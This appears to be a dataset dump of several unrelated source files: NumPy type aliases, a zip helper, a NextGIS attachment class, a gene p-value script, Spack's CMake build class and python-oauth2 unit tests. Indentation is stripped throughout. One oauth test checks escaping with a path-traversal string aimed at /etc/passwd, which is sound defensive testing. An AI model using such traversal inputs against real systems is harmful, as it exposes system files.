for i_ctype, u_ctype in zip(_int_ctypes, _uint_ctypes):
i_info = _concrete_typeinfo[i_ctype]
u_info = _concrete_typeinfo[u_ctype]
bits = i_info.bits # same for both
for info, charname, intname in [
(i_info,'i%d' % (bits//8,), 'int%d' % bits),
(u_info,'u%d' % (bits//8,), 'uint%d' % bits)]:
if bits not in seen_bits:
# sometimes two different types have the same number of bits
# if so, the one iterated over first takes precedence
allTypes[intname] = info.type
sctypeDict[intname] = info.type
sctypeDict[charname] = info.type
seen_bits.add(bits)
_add_integer_aliases()
# We use these later
void = allTypes['void']
#
# Rework the Python names (so that float and complex and int are consistent
# with Python usage)
#
def _set_up_aliases():
type_pairs = [('complex_', 'cdouble'),
('int0', 'intp'),
('uint0', 'uintp'),
('single', 'float'),
('csingle', 'cfloat'),
('singlecomplex', 'cfloat'),
('float_', 'double'),
('intc', 'int'),
('uintc', 'uint'),
('int_', 'long'),
('uint', 'ulong'),
('cfloat', 'cdouble'),
('longfloat', 'longdouble'),
('clongfloat', 'clongdouble'),
('longcomplex', 'clongdouble'),
('bool_', 'bool'),
('bytes_', 'string'),
('string_', 'string'),
('str_', 'unicode'),
('unicode_', 'unicode'),
('object_', 'object')]
for alias, t in type_pairs:
allTypes[alias] = allTypes[t]
sctypeDict[alias] = sctypeDict[t]
# Remove aliases overriding python types and modules
to_remove = ['ulong', 'object', 'int', 'float',
'complex', 'bool', 'string', 'datetime', 'timedelta',
'bytes', 'str']
for t in to_remove:
try:
del allTypes[t]
del sctypeDict[t]
except KeyError:
pass
_set_up_aliases()
sctypes = {'int': [],
'uint':[],
'float':[],
'complex':[],
'others':[bool, object, bytes, unicode, void]}
def _add_array_type(typename, bits):
try:
t = allTypes['%s%d' % (typename, bits)]
except KeyError:
pass
else:
sctypes[typename].append(t)
def _set_array_types():
ibytes = [1, 2, 4, 8, 16, 32, 64]
fbytes = [2, 4, 8, 10, 12, 16, 32, 64]
for bytes in ibytes:
bits = 8*bytes
_add_array_type('int', bits)
_add_array_type('uint', bits)
for bytes in fbytes:
bits = 8*bytes
_add_array_type('float', bits)
_add_array_type('complex', 2*bits)
_gi = dtype('p')
if _gi.type not in sctypes['int']:
indx = 0
sz = _gi.itemsize
_lst = sctypes['int']
while (indx < len(_lst) and sz >= _lst[indx](0).itemsize):
indx += 1
sctypes['int'].insert(indx, _gi.type)
sctypes['uint'].insert(indx, dtype('P').type)
_set_array_types()
# Add additional strings to the sctypeDict
_toadd = ['int', 'float', 'complex', 'bool', 'object',
'str', 'bytes', ('a', 'bytes_')]
for name in _toadd:
if isinstance(name, tuple):
sctypeDict[name[0]] = allTypes[name[1]]
else:
sctypeDict[name] = allTypes['%s_' % name]
del _toadd, name
| bsd-3-clause | -6,382,904,487,549,934,000 | 31.127572 | 103 | 0.571923 | false | 3.654963 | false | false | false |
PlushBeaver/FanFicFare | makezip.py | 2 | 1915 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2015, Jim Miller
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, zipfile, sys
from glob import glob
def addFolderToZip(myZipFile,folder,exclude=[]):
folder = folder.encode('ascii') #convert path to ascii for ZipFile Method
excludelist=[]
for ex in exclude:
excludelist.extend(glob(folder+"/"+ex))
for file in glob(folder+"/*"):
if file in excludelist:
continue
if os.path.isfile(file):
#print file
myZipFile.write(file, file, zipfile.ZIP_DEFLATED)
elif os.path.isdir(file):
addFolderToZip(myZipFile,file,exclude=exclude)
def createZipFile(filename,mode,files,exclude=[]):
myZipFile = zipfile.ZipFile( filename, mode ) # Open the zip file for writing
excludelist=[]
for ex in exclude:
excludelist.extend(glob(ex))
for file in files:
if file in excludelist:
continue
file = file.encode('ascii') #convert path to ascii for ZipFile Method
if os.path.isfile(file):
(filepath, filename) = os.path.split(file)
#print file
myZipFile.write( file, filename, zipfile.ZIP_DEFLATED )
if os.path.isdir(file):
addFolderToZip(myZipFile,file,exclude=exclude)
myZipFile.close()
return (1,filename)
| gpl-3.0 | 878,587,940,607,048,700 | 34.826923 | 81 | 0.652219 | false | 4.057203 | false | false | false |
nextgis/ngq_compulink | qgis-installer/customization-conf/plugins/identifyplus/ngw_external_api_python/core/ngw_attachment.py | 2 | 2647 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
NextGIS WEB API
-------------------
begin : 2014-11-19
git sha : $Format:%H$
copyright : (C) 2014 by NextGIS
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
FEATURE_ATTACHMENT_URL = lambda res_id, feature_id, attachment_id: '/api/resource/%d/feature/%d/attachment/%d' % (res_id, feature_id, attachment_id)
IMAGE_URL = lambda res_id, feature_id, image_id: '/api/resource/%s/feature/%d/attachment/%d/image' % (res_id, feature_id, image_id)
class NGWAttachment(object):
def __init__(self, attachment_id, ngw_feature):
self.id = attachment_id
self.ngw_feature = ngw_feature
def get_attachmet_url(self):
return FEATURE_ATTACHMENT_URL(self.ngw_feature.ngw_resource.common.id, self.ngw_feature.id, self.id)
def unlink(self):
self.ngw_feature.ngw_resource._res_factory.connection.delete(self.get_attachmet_url())
def get_image_url(self):
return IMAGE_URL(self.ngw_feature.ngw_resource.common.id, self.ngw_feature.id, self.id)
def get_image_full_url(self):
return self.ngw_feature.ngw_resource._res_factory.connection.server_url + self.get_image_url()
def get_image(self):
attachment_info = self.ngw_feature.ngw_resource._res_factory.connection.get( self.get_attachmet_url() )
name = attachment_info['name']
if name is None:
name = "image_%d"%attachment_info['id']
format = attachment_info['mime_type'].split('/')
if len(format) == 2:
format = format[1]
else:
format = "jpeg"
file_contetnt = self.ngw_feature.ngw_resource._res_factory.connection.download_file( self.get_image_url() )
return [name, format, file_contetnt] | gpl-2.0 | 7,222,059,652,694,759,000 | 47.145455 | 148 | 0.488478 | false | 4.168504 | false | false | false |
elaeon/breast_cancer_networks | scripts_toolbox/id_genes2id_pvalue.py | 2 | 2007 | import csv
import sys
#abrimos el archivo en donde estan los Affy_id y geneSymbol
id_gene = csv.reader(open("id_gene_HG.csv", 'rb'), delimiter = ',')
dict = {}
aff_id = []
#metemos en un diccionario todas la entradas del archivo y en arreglo auxiliar solo los Affy_id para posteriormente iterar en el diccionario las entradas
for row in id_gene:
dict[row[0]] = row[1]
aff_id.append(row[0])
#borramos la primera entrada del diccionario que son los encabezados
aff_id.remove("Probe Set ID")
del dict["Probe Set ID"]
#abrimos el archivo donde estan los p.value y loads lo pasamos a arreglos
name_pvalue = open("name_pvalue_1191.txt", 'rb')
name = []
pv = []
loads = []
for row in name_pvalue:
p = row.split("\t")
name.append(p[0])
pv.append(p[2])
loads.append(p[1].strip())
#cerramos el archivo
name_pvalue.close()
#y abrimos un nuevo archivo para escribir las salidas:
salida = open("id_loads.txt", "w") #sera mejor escribirlo con cvs?????
#escribimos el encabezado
salida.writelines(["Affy_id","\t\t", "gene_symbol", "\n"])
#hago split por cada entrada del diccionario
for entry in aff_id:
#print (entry, "--->" ,dict[entry])
sp = dict[entry].split(" /// ")
aux = []
#ahora por cada entrada de sp busco en el archivo y extraigo su p_value para compararlos
for chunk in sp:
for i in range(len(name)):
#print (name[i].replace("\"",""), chunk)
if name[i].replace("\"","") == chunk :
aux.append([name[i],pv[i],loads[i]])
break
#comparo los p_values y me quedo con el mas chico
if len(aux) == 0:
salida.writelines([entry,"\t\t"," NF ", "\n"])
print "paso 0"
elif len(aux) == 1:
salida.writelines([entry,"\t\t", aux[0][0], "\n"])
print "paso 1"
else:
m = 0
for i in range(len(aux)-1):
if aux[i][2] < aux[i+1][2]:
m = i
else:
m = i+1
'''
val, idx = min((val, idx) for (idx, val) in enumerate(aux))
'''
print "paso 2"
print m
salida.writelines([entry,"\t\t", aux[m][0], "\n"])
#cerramos el archivo de salida
salida.close()
| gpl-3.0 | 2,634,669,533,301,764,000 | 25.76 | 154 | 0.642252 | false | 2.453545 | false | false | false |
rspavel/spack | lib/spack/spack/build_systems/cmake.py | 3 | 14333 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import inspect
import os
import platform
import re
import spack.build_environment
from llnl.util.filesystem import working_dir
from spack.util.environment import filter_system_paths
from spack.directives import depends_on, variant
from spack.package import PackageBase, InstallError, run_after
# Regex to extract the primary generator from the CMake generator
# string.
_primary_generator_extractor = re.compile(r'(?:.* - )?(.*)')
def _extract_primary_generator(generator):
"""Use the compiled regex _primary_generator_extractor to extract the
primary generator from the generator string which may contain an
optional secondary generator.
"""
primary_generator = _primary_generator_extractor.match(generator).group(1)
return primary_generator
class CMakePackage(PackageBase):
"""Specialized class for packages built using CMake
For more information on the CMake build system, see:
https://cmake.org/cmake/help/latest/
This class provides three phases that can be overridden:
1. :py:meth:`~.CMakePackage.cmake`
2. :py:meth:`~.CMakePackage.build`
3. :py:meth:`~.CMakePackage.install`
They all have sensible defaults and for many packages the only thing
necessary will be to override :py:meth:`~.CMakePackage.cmake_args`.
For a finer tuning you may also override:
+-----------------------------------------------+--------------------+
| **Method** | **Purpose** |
+===============================================+====================+
| :py:meth:`~.CMakePackage.root_cmakelists_dir` | Location of the |
| | root CMakeLists.txt|
+-----------------------------------------------+--------------------+
| :py:meth:`~.CMakePackage.build_directory` | Directory where to |
| | build the package |
+-----------------------------------------------+--------------------+
The generator used by CMake can be specified by providing the
generator attribute. Per
https://cmake.org/cmake/help/git-master/manual/cmake-generators.7.html,
the format is: [<secondary-generator> - ]<primary_generator>. The
full list of primary and secondary generators supported by CMake may
be found in the documentation for the version of CMake used;
however, at this time Spack supports only the primary generators
"Unix Makefiles" and "Ninja." Spack's CMake support is agnostic with
respect to primary generators. Spack will generate a runtime error
if the generator string does not follow the prescribed format, or if
the primary generator is not supported.
"""
#: Phases of a CMake package
phases = ['cmake', 'build', 'install']
#: This attribute is used in UI queries that need to know the build
#: system base class
build_system_class = 'CMakePackage'
build_targets = []
install_targets = ['install']
build_time_test_callbacks = ['check']
#: The build system generator to use.
#:
#: See ``cmake --help`` for a list of valid generators.
#: Currently, "Unix Makefiles" and "Ninja" are the only generators
#: that Spack supports. Defaults to "Unix Makefiles".
#:
#: See https://cmake.org/cmake/help/latest/manual/cmake-generators.7.html
#: for more information.
generator = 'Unix Makefiles'
# https://cmake.org/cmake/help/latest/variable/CMAKE_BUILD_TYPE.html
variant('build_type', default='RelWithDebInfo',
description='CMake build type',
values=('Debug', 'Release', 'RelWithDebInfo', 'MinSizeRel'))
depends_on('cmake', type='build')
@property
def archive_files(self):
"""Files to archive for packages based on CMake"""
return [os.path.join(self.build_directory, 'CMakeCache.txt')]
@property
def root_cmakelists_dir(self):
"""The relative path to the directory containing CMakeLists.txt
This path is relative to the root of the extracted tarball,
not to the ``build_directory``. Defaults to the current directory.
:return: directory containing CMakeLists.txt
"""
return self.stage.source_path
@property
def std_cmake_args(self):
"""Standard cmake arguments provided as a property for
convenience of package writers
:return: standard cmake arguments
"""
# standard CMake arguments
std_cmake_args = CMakePackage._std_args(self)
std_cmake_args += getattr(self, 'cmake_flag_args', [])
return std_cmake_args
@staticmethod
def _std_args(pkg):
"""Computes the standard cmake arguments for a generic package"""
try:
generator = pkg.generator
except AttributeError:
generator = 'Unix Makefiles'
# Make sure a valid generator was chosen
valid_primary_generators = ['Unix Makefiles', 'Ninja']
primary_generator = _extract_primary_generator(generator)
if primary_generator not in valid_primary_generators:
msg = "Invalid CMake generator: '{0}'\n".format(generator)
msg += "CMakePackage currently supports the following "
msg += "primary generators: '{0}'".\
format("', '".join(valid_primary_generators))
raise InstallError(msg)
try:
build_type = pkg.spec.variants['build_type'].value
except KeyError:
build_type = 'RelWithDebInfo'
define = CMakePackage.define
args = [
'-G', generator,
define('CMAKE_INSTALL_PREFIX', pkg.prefix),
define('CMAKE_BUILD_TYPE', build_type),
]
if primary_generator == 'Unix Makefiles':
args.append(define('CMAKE_VERBOSE_MAKEFILE', True))
if platform.mac_ver()[0]:
args.extend([
define('CMAKE_FIND_FRAMEWORK', "LAST"),
define('CMAKE_FIND_APPBUNDLE', "LAST"),
])
# Set up CMake rpath
args.extend([
define('CMAKE_INSTALL_RPATH_USE_LINK_PATH', False),
define('CMAKE_INSTALL_RPATH',
spack.build_environment.get_rpaths(pkg)),
])
# CMake's find_package() looks in CMAKE_PREFIX_PATH first, help CMake
# to find immediate link dependencies in right places:
deps = [d.prefix for d in
pkg.spec.dependencies(deptype=('build', 'link'))]
deps = filter_system_paths(deps)
args.append(define('CMAKE_PREFIX_PATH', deps))
return args
@staticmethod
def define(cmake_var, value):
"""Return a CMake command line argument that defines a variable.
The resulting argument will convert boolean values to OFF/ON
and lists/tuples to CMake semicolon-separated string lists. All other
values will be interpreted as strings.
Examples:
.. code-block:: python
[define('BUILD_SHARED_LIBS', True),
define('CMAKE_CXX_STANDARD', 14),
define('swr', ['avx', 'avx2'])]
will generate the following configuration options:
.. code-block:: console
["-DBUILD_SHARED_LIBS:BOOL=ON",
"-DCMAKE_CXX_STANDARD:STRING=14",
"-DSWR:STRING=avx;avx2]
"""
# Create a list of pairs. Each pair includes a configuration
# option and whether or not that option is activated
if isinstance(value, bool):
kind = 'BOOL'
value = "ON" if value else "OFF"
else:
kind = 'STRING'
if isinstance(value, (list, tuple)):
value = ";".join(str(v) for v in value)
else:
value = str(value)
return "".join(["-D", cmake_var, ":", kind, "=", value])
def define_from_variant(self, cmake_var, variant=None):
"""Return a CMake command line argument from the given variant's value.
The optional ``variant`` argument defaults to the lower-case transform
of ``cmake_var``.
This utility function is similar to
:py:meth:`~.AutotoolsPackage.with_or_without`.
Examples:
Given a package with:
.. code-block:: python
variant('cxxstd', default='11', values=('11', '14'),
multi=False, description='')
variant('shared', default=True, description='')
variant('swr', values=any_combination_of('avx', 'avx2'),
description='')
calling this function like:
.. code-block:: python
[define_from_variant('BUILD_SHARED_LIBS', 'shared'),
define_from_variant('CMAKE_CXX_STANDARD', 'cxxstd'),
define_from_variant('SWR')]
will generate the following configuration options:
.. code-block:: console
["-DBUILD_SHARED_LIBS:BOOL=ON",
"-DCMAKE_CXX_STANDARD:STRING=14",
"-DSWR:STRING=avx;avx2]
for ``<spec-name> cxxstd=14 +shared swr=avx,avx2``
"""
if variant is None:
variant = cmake_var.lower()
if variant not in self.variants:
raise KeyError(
'"{0}" is not a variant of "{1}"'.format(variant, self.name))
value = self.spec.variants[variant].value
if isinstance(value, (tuple, list)):
# Sort multi-valued variants for reproducibility
value = sorted(value)
return self.define(cmake_var, value)
def flags_to_build_system_args(self, flags):
"""Produces a list of all command line arguments to pass the specified
compiler flags to cmake. Note CMAKE does not have a cppflags option,
so cppflags will be added to cflags, cxxflags, and fflags to mimic the
behavior in other tools."""
# Has to be dynamic attribute due to caching
setattr(self, 'cmake_flag_args', [])
flag_string = '-DCMAKE_{0}_FLAGS={1}'
langs = {'C': 'c', 'CXX': 'cxx', 'Fortran': 'f'}
# Handle language compiler flags
for lang, pre in langs.items():
flag = pre + 'flags'
# cmake has no explicit cppflags support -> add it to all langs
lang_flags = ' '.join(flags.get(flag, []) + flags.get('cppflags',
[]))
if lang_flags:
self.cmake_flag_args.append(flag_string.format(lang,
lang_flags))
# Cmake has different linker arguments for different build types.
# We specify for each of them.
if flags['ldflags']:
ldflags = ' '.join(flags['ldflags'])
ld_string = '-DCMAKE_{0}_LINKER_FLAGS={1}'
# cmake has separate linker arguments for types of builds.
for type in ['EXE', 'MODULE', 'SHARED', 'STATIC']:
self.cmake_flag_args.append(ld_string.format(type, ldflags))
# CMake has libs options separated by language. Apply ours to each.
if flags['ldlibs']:
libs_flags = ' '.join(flags['ldlibs'])
libs_string = '-DCMAKE_{0}_STANDARD_LIBRARIES={1}'
for lang in langs:
self.cmake_flag_args.append(libs_string.format(lang,
libs_flags))
@property
def build_directory(self):
"""Returns the directory to use when building the package
:return: directory where to build the package
"""
return os.path.join(self.stage.path, 'spack-build')
def cmake_args(self):
"""Produces a list containing all the arguments that must be passed to
cmake, except:
* CMAKE_INSTALL_PREFIX
* CMAKE_BUILD_TYPE
which will be set automatically.
:return: list of arguments for cmake
"""
return []
def cmake(self, spec, prefix):
"""Runs ``cmake`` in the build directory"""
options = self.std_cmake_args
options += self.cmake_args()
options.append(os.path.abspath(self.root_cmakelists_dir))
with working_dir(self.build_directory, create=True):
inspect.getmodule(self).cmake(*options)
def build(self, spec, prefix):
"""Make the build targets"""
with working_dir(self.build_directory):
if self.generator == 'Unix Makefiles':
inspect.getmodule(self).make(*self.build_targets)
elif self.generator == 'Ninja':
self.build_targets.append("-v")
inspect.getmodule(self).ninja(*self.build_targets)
def install(self, spec, prefix):
"""Make the install targets"""
with working_dir(self.build_directory):
if self.generator == 'Unix Makefiles':
inspect.getmodule(self).make(*self.install_targets)
elif self.generator == 'Ninja':
inspect.getmodule(self).ninja(*self.install_targets)
run_after('build')(PackageBase._run_default_build_time_test_callbacks)
def check(self):
"""Searches the CMake-generated Makefile for the target ``test``
and runs it if found.
"""
with working_dir(self.build_directory):
if self.generator == 'Unix Makefiles':
self._if_make_target_execute('test',
jobs_env='CTEST_PARALLEL_LEVEL')
self._if_make_target_execute('check')
elif self.generator == 'Ninja':
self._if_ninja_target_execute('test',
jobs_env='CTEST_PARALLEL_LEVEL')
self._if_ninja_target_execute('check')
# Check that self.prefix is there after installation
run_after('install')(PackageBase.sanity_check_prefix)
| lgpl-2.1 | 1,484,900,245,329,804,500 | 37.323529 | 79 | 0.577618 | false | 4.458165 | true | false | false |
chrisdickinson/python-oauth2 | tests/test_oauth.py | 1 | 30405 | """
The MIT License
Copyright (c) 2009 Vic Fryzel
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import sys, os
sys.path[0:0] = [os.path.join(os.path.dirname(__file__), ".."),]
import unittest
import oauth2 as oauth
import random
import time
import urllib
import urlparse
from types import ListType
import mox
import httplib2
# Fix for python2.5 compatibility
try:
from urlparse import parse_qs, parse_qsl
except ImportError:
from cgi import parse_qs, parse_qsl
class TestError(unittest.TestCase):
def test_message(self):
try:
raise oauth.Error
except oauth.Error, e:
self.assertEqual(e.message, 'OAuth error occured.')
msg = 'OMG THINGS BROKE!!!!'
try:
raise oauth.Error(msg)
except oauth.Error, e:
self.assertEqual(e.message, msg)
class TestGenerateFunctions(unittest.TestCase):
def test_build_auth_header(self):
header = oauth.build_authenticate_header()
self.assertEqual(header['WWW-Authenticate'], 'OAuth realm=""')
self.assertEqual(len(header), 1)
realm = 'http://example.myrealm.com/'
header = oauth.build_authenticate_header(realm)
self.assertEqual(header['WWW-Authenticate'], 'OAuth realm="%s"' %
realm)
self.assertEqual(len(header), 1)
def test_escape(self):
string = 'http://whatever.com/~someuser/?test=test&other=other'
self.assert_('~' in oauth.escape(string))
string = '../../../../../../../etc/passwd'
self.assert_('../' not in oauth.escape(string))
def test_gen_nonce(self):
nonce = oauth.generate_nonce()
self.assertEqual(len(nonce), 8)
nonce = oauth.generate_nonce(20)
self.assertEqual(len(nonce), 20)
def test_gen_verifier(self):
verifier = oauth.generate_verifier()
self.assertEqual(len(verifier), 8)
verifier = oauth.generate_verifier(16)
self.assertEqual(len(verifier), 16)
def test_gen_timestamp(self):
exp = int(time.time())
now = oauth.generate_timestamp()
self.assertEqual(exp, now)
class TestConsumer(unittest.TestCase):
def setUp(self):
self.key = 'my-key'
self.secret = 'my-secret'
self.consumer = oauth.Consumer(key=self.key, secret=self.secret)
def test_init(self):
self.assertEqual(self.consumer.key, self.key)
self.assertEqual(self.consumer.secret, self.secret)
def test_basic(self):
self.assertRaises(ValueError, lambda: oauth.Consumer(None, None))
self.assertRaises(ValueError, lambda: oauth.Consumer('asf', None))
self.assertRaises(ValueError, lambda: oauth.Consumer(None, 'dasf'))
def test_str(self):
res = dict(parse_qsl(str(self.consumer)))
self.assertTrue('oauth_consumer_key' in res)
self.assertTrue('oauth_consumer_secret' in res)
self.assertEquals(res['oauth_consumer_key'], self.consumer.key)
self.assertEquals(res['oauth_consumer_secret'], self.consumer.secret)
class TestToken(unittest.TestCase):
def setUp(self):
self.key = 'my-key'
self.secret = 'my-secret'
self.token = oauth.Token(self.key, self.secret)
def test_basic(self):
self.assertRaises(ValueError, lambda: oauth.Token(None, None))
self.assertRaises(ValueError, lambda: oauth.Token('asf', None))
self.assertRaises(ValueError, lambda: oauth.Token(None, 'dasf'))
def test_init(self):
self.assertEqual(self.token.key, self.key)
self.assertEqual(self.token.secret, self.secret)
self.assertEqual(self.token.callback, None)
self.assertEqual(self.token.callback_confirmed, None)
self.assertEqual(self.token.verifier, None)
def test_set_callback(self):
self.assertEqual(self.token.callback, None)
self.assertEqual(self.token.callback_confirmed, None)
cb = 'http://www.example.com/my-callback'
self.token.set_callback(cb)
self.assertEqual(self.token.callback, cb)
self.assertEqual(self.token.callback_confirmed, 'true')
self.token.set_callback(None)
self.assertEqual(self.token.callback, None)
# TODO: The following test should probably not pass, but it does
# To fix this, check for None and unset 'true' in set_callback
# Additionally, should a confirmation truly be done of the callback?
self.assertEqual(self.token.callback_confirmed, 'true')
def test_set_verifier(self):
self.assertEqual(self.token.verifier, None)
v = oauth.generate_verifier()
self.token.set_verifier(v)
self.assertEqual(self.token.verifier, v)
self.token.set_verifier()
self.assertNotEqual(self.token.verifier, v)
self.token.set_verifier('')
self.assertEqual(self.token.verifier, '')
def test_get_callback_url(self):
self.assertEqual(self.token.get_callback_url(), None)
self.token.set_verifier()
self.assertEqual(self.token.get_callback_url(), None)
cb = 'http://www.example.com/my-callback?save=1&return=true'
v = oauth.generate_verifier()
self.token.set_callback(cb)
self.token.set_verifier(v)
url = self.token.get_callback_url()
verifier_str = '&oauth_verifier=%s' % v
self.assertEqual(url, '%s%s' % (cb, verifier_str))
cb = 'http://www.example.com/my-callback-no-query'
v = oauth.generate_verifier()
self.token.set_callback(cb)
self.token.set_verifier(v)
url = self.token.get_callback_url()
verifier_str = '?oauth_verifier=%s' % v
self.assertEqual(url, '%s%s' % (cb, verifier_str))
def test_to_string(self):
string = 'oauth_token_secret=%s&oauth_token=%s' % (self.secret,
self.key)
self.assertEqual(self.token.to_string(), string)
self.token.set_callback('http://www.example.com/my-callback')
string += '&oauth_callback_confirmed=true'
self.assertEqual(self.token.to_string(), string)
def _compare_tokens(self, new):
self.assertEqual(self.token.key, new.key)
self.assertEqual(self.token.secret, new.secret)
# TODO: What about copying the callback to the new token?
# self.assertEqual(self.token.callback, new.callback)
self.assertEqual(self.token.callback_confirmed,
new.callback_confirmed)
# TODO: What about copying the verifier to the new token?
# self.assertEqual(self.token.verifier, new.verifier)
def test_to_string(self):
tok = oauth.Token('tooken', 'seecret')
self.assertEqual(str(tok), 'oauth_token_secret=seecret&oauth_token=tooken')
def test_from_string(self):
self.assertRaises(ValueError, lambda: oauth.Token.from_string(''))
self.assertRaises(ValueError, lambda: oauth.Token.from_string('blahblahblah'))
self.assertRaises(ValueError, lambda: oauth.Token.from_string('blah=blah'))
self.assertRaises(ValueError, lambda: oauth.Token.from_string('oauth_token_secret=asfdasf'))
self.assertRaises(ValueError, lambda: oauth.Token.from_string('oauth_token_secret='))
self.assertRaises(ValueError, lambda: oauth.Token.from_string('oauth_token=asfdasf'))
self.assertRaises(ValueError, lambda: oauth.Token.from_string('oauth_token='))
self.assertRaises(ValueError, lambda: oauth.Token.from_string('oauth_token=&oauth_token_secret='))
self.assertRaises(ValueError, lambda: oauth.Token.from_string('oauth_token=tooken%26oauth_token_secret=seecret'))
string = self.token.to_string()
new = oauth.Token.from_string(string)
self._compare_tokens(new)
self.token.set_callback('http://www.example.com/my-callback')
string = self.token.to_string()
new = oauth.Token.from_string(string)
self._compare_tokens(new)
class TestRequest(unittest.TestCase):
def test_setter(self):
url = "http://example.com"
method = "GET"
req = oauth.Request(method)
try:
url = req.url
self.fail("AttributeError should have been raised on empty url.")
except AttributeError:
pass
except Exception, e:
self.fail(str(e))
def test_deleter(self):
url = "http://example.com"
method = "GET"
req = oauth.Request(method, url)
try:
del req.url
url = req.url
self.fail("AttributeError should have been raised on empty url.")
except AttributeError:
pass
except Exception, e:
self.fail(str(e))
def test_url(self):
url1 = "http://example.com:80/foo.php"
url2 = "https://example.com:443/foo.php"
exp1 = "http://example.com/foo.php"
exp2 = "https://example.com/foo.php"
method = "GET"
req = oauth.Request(method, url1)
self.assertEquals(req.url, exp1)
req = oauth.Request(method, url2)
self.assertEquals(req.url, exp2)
def test_get_parameter(self):
url = "http://example.com"
method = "GET"
params = {'oauth_consumer' : 'asdf'}
req = oauth.Request(method, url, parameters=params)
self.assertEquals(req.get_parameter('oauth_consumer'), 'asdf')
self.assertRaises(oauth.Error, req.get_parameter, 'blah')
def test_get_nonoauth_parameters(self):
oauth_params = {
'oauth_consumer': 'asdfasdfasdf'
}
other_params = {
'foo': 'baz',
'bar': 'foo',
'multi': ['FOO','BAR']
}
params = oauth_params
params.update(other_params)
req = oauth.Request("GET", "http://example.com", params)
self.assertEquals(other_params, req.get_nonoauth_parameters())
def test_to_header(self):
realm = "http://sp.example.com/"
params = {
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': "137131200",
'oauth_consumer_key': "0685bd9184jfhq22",
'oauth_signature_method': "HMAC-SHA1",
'oauth_token': "ad180jjd733klru7",
'oauth_signature': "wOJIO9A2W5mFwDgiDvZbTSMK%2FPY%3D",
}
req = oauth.Request("GET", realm, params)
header, value = req.to_header(realm).items()[0]
parts = value.split('OAuth ')
vars = parts[1].split(', ')
self.assertTrue(len(vars), (len(params) + 1))
res = {}
for v in vars:
var, val = v.split('=')
res[var] = urllib.unquote(val.strip('"'))
self.assertEquals(realm, res['realm'])
del res['realm']
self.assertTrue(len(res), len(params))
for key, val in res.items():
self.assertEquals(val, params.get(key))
def test_to_postdata(self):
realm = "http://sp.example.com/"
params = {
'multi': ['FOO','BAR'],
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': "137131200",
'oauth_consumer_key': "0685bd9184jfhq22",
'oauth_signature_method': "HMAC-SHA1",
'oauth_token': "ad180jjd733klru7",
'oauth_signature': "wOJIO9A2W5mFwDgiDvZbTSMK%2FPY%3D",
}
req = oauth.Request("GET", realm, params)
flat = [('multi','FOO'),('multi','BAR')]
del params['multi']
flat.extend(params.items())
kf = lambda x: x[0]
self.assertEquals(sorted(flat, key=kf), sorted(parse_qsl(req.to_postdata()), key=kf))
def test_to_url(self):
url = "http://sp.example.com/"
params = {
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': "137131200",
'oauth_consumer_key': "0685bd9184jfhq22",
'oauth_signature_method': "HMAC-SHA1",
'oauth_token': "ad180jjd733klru7",
'oauth_signature': "wOJIO9A2W5mFwDgiDvZbTSMK%2FPY%3D",
}
req = oauth.Request("GET", url, params)
exp = urlparse.urlparse("%s?%s" % (url, urllib.urlencode(params)))
res = urlparse.urlparse(req.to_url())
self.assertEquals(exp.scheme, res.scheme)
self.assertEquals(exp.netloc, res.netloc)
self.assertEquals(exp.path, res.path)
a = parse_qs(exp.query)
b = parse_qs(res.query)
self.assertEquals(a, b)
def test_get_normalized_parameters(self):
url = "http://sp.example.com/"
params = {
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': "137131200",
'oauth_consumer_key': "0685bd9184jfhq22",
'oauth_signature_method': "HMAC-SHA1",
'oauth_token': "ad180jjd733klru7",
'multi': ['FOO','BAR'],
}
req = oauth.Request("GET", url, params)
res = req.get_normalized_parameters()
srtd = [(k, v if type(v) != ListType else sorted(v)) for k,v in sorted(params.items())]
self.assertEquals(urllib.urlencode(srtd, True), res)
def test_get_normalized_parameters_ignores_auth_signature(self):
url = "http://sp.example.com/"
params = {
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': "137131200",
'oauth_consumer_key': "0685bd9184jfhq22",
'oauth_signature_method': "HMAC-SHA1",
'oauth_signature': "some-random-signature-%d" % random.randint(1000, 2000),
'oauth_token': "ad180jjd733klru7",
}
req = oauth.Request("GET", url, params)
res = req.get_normalized_parameters()
self.assertNotEquals(urllib.urlencode(sorted(params.items())), res)
foo = params.copy()
del foo["oauth_signature"]
self.assertEqual(urllib.urlencode(sorted(foo.items())), res)
